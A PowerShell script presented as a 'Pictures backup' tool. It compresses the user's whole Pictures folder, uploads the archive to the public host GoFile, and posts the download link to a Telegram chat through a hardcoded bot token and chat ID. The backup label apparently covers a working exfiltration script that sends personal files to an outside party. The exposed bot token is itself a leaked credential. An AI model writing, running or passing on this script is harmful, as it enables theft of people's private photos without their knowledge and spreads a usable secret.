# ========================================
#        ROBUST PICTURES BACKUP SCRIPT
# ========================================

# ---- SECURITY PROTOCOL (important) ----
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ErrorActionPreference = "Stop"

# ---- TELEGRAM CONFIG ----
$BotToken = "8160534358:AAGKwhDjIS1xGFUCSBD7zU2pBH-YnfvKV_w"
$ChatId   = "2146236602"

# ---- PATHS ----
$PicturesFolder = "$env:USERPROFILE\Pictures"
$ZipFile        = "$env:TEMP\Pictures_Backup.zip"

# ---- PAUSE FUNCTION (prevents window closing) ----
function Pause-Script {
    Write-Host "`nPress ENTER to exit..." -ForegroundColor Gray
    Read-Host | Out-Null
    exit
}

Clear-Host
Write-Host "=== PICTURES BACKUP STARTED ===" -ForegroundColor Magenta

# -------------------------------------------------
# STEP 1: ZIP PICTURES FOLDER
# -------------------------------------------------
Write-Host "[1/4] Zipping Pictures folder..." -ForegroundColor Cyan

try {
    if (-not (Test-Path $PicturesFolder)) {
        throw "Pictures folder not found: $PicturesFolder"
    }

    if (Test-Path $ZipFile) {
        Remove-Item $ZipFile -Force
    }

    Compress-Archive -Path "$PicturesFolder\*" -DestinationPath $ZipFile -Force
    Write-Host "      ZIP created successfully." -ForegroundColor Green
}
catch {
    Write-Host "[-] ZIP ERROR: $($_.Exception.Message)" -ForegroundColor Red
    Pause-Script
}

# -------------------------------------------------
# STEP 2: GET GOFILE SERVER (NEW API)
# -------------------------------------------------
Write-Host "[2/4] Getting GoFile server..." -ForegroundColor Cyan

try {
    $serverInfo = Invoke-RestMethod -Uri "https://api.gofile.io/servers" `
                                    -UserAgent "Mozilla/5.0"

    if ($serverInfo.status -ne "ok") {
        throw "GoFile server API error"
    }

    $server = $serverInfo.data.servers[0].name

    if ([string]::IsNullOrWhiteSpace($server)) {
        throw "No server returned"
    }

    Write-Host "      Using server: $server" -ForegroundColor Green
}
catch {
    Write-Host "[-] SERVER ERROR: $($_.Exception.Message)" -ForegroundColor Red
    Pause-Script
}

# -------------------------------------------------
# STEP 3: UPLOAD ZIP TO GOFILE
# -------------------------------------------------
Write-Host "[3/4] Uploading ZIP to GoFile (please wait)..." -ForegroundColor Cyan

try {
    $curlPath = "$env:SystemRoot\System32\curl.exe"
    if (-not (Test-Path $curlPath)) {
        throw "curl.exe not found (Windows 10/11 required)"
    }

    $uploadUrl = "https://$server.gofile.io/uploadFile"

    $curlOutput = & $curlPath -s -F "file=@$ZipFile" $uploadUrl
    $result = $curlOutput | Out-String | ConvertFrom-Json

    if ($result.status -ne "ok") {
        throw "Upload failed"
    }

    $DownloadLink = $result.data.downloadPage

    Write-Host "      Upload successful!" -ForegroundColor Green
    Write-Host "      Link: $DownloadLink" -ForegroundColor Yellow
}
catch {
    Write-Host "[-] UPLOAD ERROR" -ForegroundColor Red
    Write-Host "    Raw response:" -ForegroundColor Gray
    Write-Host $curlOutput
    Pause-Script
}

# -------------------------------------------------
# STEP 4: SEND LINK TO TELEGRAM
# -------------------------------------------------
Write-Host "[4/4] Sending link to Telegram..." -ForegroundColor Cyan

try {
    $message = "📁 *Pictures Backup Completed*`n`n🔗 $DownloadLink"

    Invoke-RestMethod -Uri "https://api.telegram.org/bot$BotToken/sendMessage" `
        -Method Post `
        -Body @{
            chat_id    = $ChatId
            text       = $message
            parse_mode = "Markdown"
        }

    Write-Host "      Telegram message sent." -ForegroundColor Green
}
catch {
    Write-Host "[-] TELEGRAM ERROR: $($_.Exception.Message)" -ForegroundColor Red
    Pause-Script
}

# -------------------------------------------------
# CLEANUP
# -------------------------------------------------
Remove-Item $ZipFile -Force -ErrorAction SilentlyContinue

Write-Host "`n[✓] BACKUP COMPLETED SUCCESSFULLY" -ForegroundColor Green
Pause-Script
